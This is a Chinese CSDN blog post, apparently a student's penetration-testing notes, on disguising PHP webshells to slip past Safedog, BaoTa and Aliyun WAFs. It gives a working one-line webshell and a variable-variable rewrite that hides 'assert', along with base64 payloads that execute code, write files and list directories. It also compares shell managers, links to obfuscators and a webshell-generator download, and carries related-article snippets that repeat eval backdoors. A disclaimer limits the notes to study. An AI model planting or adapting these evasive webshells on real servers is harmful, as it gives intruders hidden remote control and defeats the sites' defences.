WAF绕过-权限控制之代码混淆及行为造轮子

最新推荐文章于 2023-11-21 11:54:45 发布
最新推荐文章于 2023-11-21 11:54:45 发布
阅读量294 收藏
点赞数
分类专栏: 渗透测试 web 网络安全 文章标签: 代码混淆 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19446965/article/details/119407151
版权
网络安全 同时被 3 个专栏收录
33 篇文章 8 订阅
订阅专栏
渗透测试
18 篇文章 4 订阅
订阅专栏
web
5 篇文章 0 订阅
订阅专栏

 免责声明: 本内容仅为【小迪安全-web渗透测试】的学习笔记,仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。

Safedog代码层手写及脚本绕过

变量覆盖,加密混淆,异或生成

BT Aliyun代码层手写及脚本绕过

编码解码(变量覆盖,加密混淆,异或生成)

ASP,PHP,ASPX,JSP,PY等后门免杀同理

http://test.xxx.com/x.php?id=x
mr6=cGhwaW5mbygpOw==
http://test.xxx.com/xx.php?x=b&y=assert
z=cGhwaW5mbygpOw== 执行代码
z=ZmlsZV9wdXRfY29udGVudHMoInRlc3QudHh0IiwiMSIpOw== 写入文件
z=dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs= 读取文件

菜刀,蚁剑,冰蝎优缺点
菜刀:未更新状态,无插件,单向加密传输
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,双向加密传输

演示案例:
➢ Safedog-手写覆盖变异简易代码绕过-代码层

一句话木马:<?php assert($_POST['chopper']);?>
替换成:
<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_POST['z']);
?>
可以绕过safedog

//x=b&y=assert
//$a=b  $$a=assert=$b assert($_POST['z']);

上传成功后,
例:http://127.0.0.1:8081/x/1.php?x=b&y=assert
再(可以用hackbar插件)postdata:z=phpinfo()

➢ Safedog-基于接口类加密混淆代码绕过-代码层
https://www.phpjiami.com/phpjiami.html
➢ BT,Aliyun-基于覆盖加密变异下编码解码绕过-代码层
https://www.phpjiami.com/phpjiami.html
➢ Safedog-基于工具功能数据包指纹修改变异绕过-行为层
https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:xiao

 基于python开发的一个工具,打开后运行php-venom-3.3.py即可生成免杀后门文件。
 也可以自己二次开发,代码不难。
 上传成功后使用例(base64加密):http://www.xxx.com/text.php?id=dxads
 							post data: mr6=cGhwaW5maSgpOw==
 							//cGhwaW5maSgpOw== 为phpinfo();的base64加密

➢ Safedog,BT,Aliyun-基于冰蝎新型控制器绕过全面测试-行为层
➢ Safedog,BT,Aliyun-基于手写新型控制器绕过全面测试-行为层

 

 涉及资源:
混淆加密工具:https://github.com/djunny/enphp
https://www.phpjiami.com/phpjiami.html
冰蝎:https://github.com/rebeyond/Behinder/releases/
蚁剑:https://github.com/AntSwordProject/antSword/releases
webshell-venom-master:https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:xiao

参考:

Rnan-prince
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第48天:WAF绕过-权限控制代码混淆行为轮子1
08-03
WAF 绕过-权限控制代码混淆行为轮子#Safedog 代码层手写及脚本绕过变量覆盖,加密混淆,异或生成#BT Aliyun 代码层手写及脚本绕过编码解码
第48天-WAF 绕过-权限控制代码混淆行为轮子
MCTSOG的博客
04-11 983
思维导图 Safedog 代码层手写及脚本绕过 变量覆盖,加密混淆,异或生成 BT Aliyun 代码层手写及脚本绕过 编码解码(变量覆盖,加密混淆,异或生成) ASP,PHP,ASPX,JSP,PY 等后门免杀同理 一句话后门的原理: <?php@eval($_POST['password']) ?> @再php中含义为后面如果执行错误不会报错 eval()函数表示括号里的语句全做代码执行 $_POST[‘password’]`表示从页面中以post方式获取变量password的值。
WAF绕过-木马混淆免杀姿势
告白的博客
08-27 832
0x00 简介 为了获取对方的控制权,通常会采取使用代码木马执行,使用shell工具连接,但是往往注入代码会被waf拦截,无法注入也就无法获取shell连接,就算绕过代码检测之后,执行的行为也可能被waf设备拦截,导致无法执行shell操作,下面从代码的注入绕过,与代码注入后执行操作绕过总方法,下面总结几种最新的绕过姿势。 常见脚本: PHP, JSP, ASP, ASPX, Pytohn… 常见shell工具:中国菜刀, 蚂蚁宝剑, 冰蝎 比较推荐使用冰蝎适合后渗透,菜刀的使用比较局限也没有更新了, 菜
移动端页面px布局适配方案(viewport)
热门推荐
凌晨不睡觉
08-02 16万+
通过 <meta name="viewport"> 给视口设置固定的宽度,浏览器对页面自动缩放来实现页面的适配效果 优点是可以使用px布局,不用额外进行rem或者vw等等单位的换算了...
48:WAF绕过-权限控制代码混淆行为轮子
mingyqf的博客
05-07 244
本文为复现笔记,侵删 (https://www.cnblogs.com/zhengna/p/15133613.html) 文章目录思维导图**Safedog代码层手写及脚本绕过****BT Aliyun代码层手写及脚本绕过****ASP,PHP,ASPX,JSP,PY等后门免杀同理****案例1:Safedog-手写覆盖变量简易代码绕过-代码层****案例2:Safedog,BT,Aliyun-基于 覆盖变量 编码解码 绕过-代码层****案例3:Safedog-基于接口类加密混淆代码绕过-代码层****方
php一句话木马免杀
最新发布
qq_58683895的博客
11-21 1729
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
第47天:WAF绕过-漏洞发现之代理池指纹被动探针1
08-03
1.扫描速度-(代理池,延迟,白名单等) 2.工具指纹-(特征修改,伪模拟真实用户等) 3.漏洞 Payload-(数据变异,数据加密,白名单等)
第46天:WAF绕过-信息收集之反爬虫延时代理池技术1
08-03
WAF 绕过-信息收集之反爬虫延时代理池技术#简要本章具体内容和安排缘由#简要本课具体内容和讲课思路#简要本课简要知识点和具体说明演示案例:Safedog-默认
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
PHP之一句话木马免杀
墨痕诉清风的博客
10-07 5682
目录 免杀小技巧 1.字符串拼接方式,构敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构字符串 免杀木马构 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式,构敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3128
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
免杀PHP一句话木马(把阿里云给过了)
weixin_50464560的博客
05-21 5142
免杀PHP一句话木马:https://www.cnblogs.com/sunny11/p/13680612.html 原酒仙桥文章:(这是全部渗透过程)https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247487032&idx=1&sn=c124a25ededa31f3d695e906fbcb752d&chksm=9b392889ac4ea19fa2b7e02c6048b697ed00924e64d93d3f037
实战|记一次绕过宝塔防火墙的BC站渗透
zhangge3663的博客
05-06 1万+
0x00 信息收集 由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息 这是一个查询代理帐号的站 url输入admin 自动跳转至后台 看这个参数,猜测可能是thinkCMF 0x01 getshell thinkcmf正好有一个RCE 可以尝试一下 ?a=fetch&templateFile=public/index&prefix='' &content=<php>file_put_content
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2378
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
免杀学习——PHP免杀
ZxC789456302的博客
10-23 1767
php上马免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
一句话木马绕过检测的常见思路
si1ence的博客
09-07 1万+
0x0 背景 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用,居家生活搞站越货必备神器。主要总结一下常见的绕过安全检测的思路,欢迎各位大佬参与讨论。 0x1 关键函数编码 主要通过一些字符串对关键的几个函数比如eval、assert等函数进行变换绕过检测 如下代码使用\x65编码字符串’e’,使用array类型进行混淆: &lt;?php array_ma...
绕过WAF-一句话木马
qq_30787769的博客
12-10 2561
注:本次的测试环境是最新的安全狗Apache:V4.0 一句话木马:<?php eval($_REQUEST['a'])?> 1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func() 2.使用end()函数来代替,可以写成: <?php eval(end($_REQUE...
绕过WAF代码混淆权限控制下的行为轮子实战
在第48天的学习内容中,我们探讨了WAFWeb应用防火墙)绕过的策略,特别关注的是如何在权限控制下通过代码混淆行为层面的操作来实现这一目标。这部分技术主要针对Safedog、BTAliyun等平台,涉及到的手法包括但不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值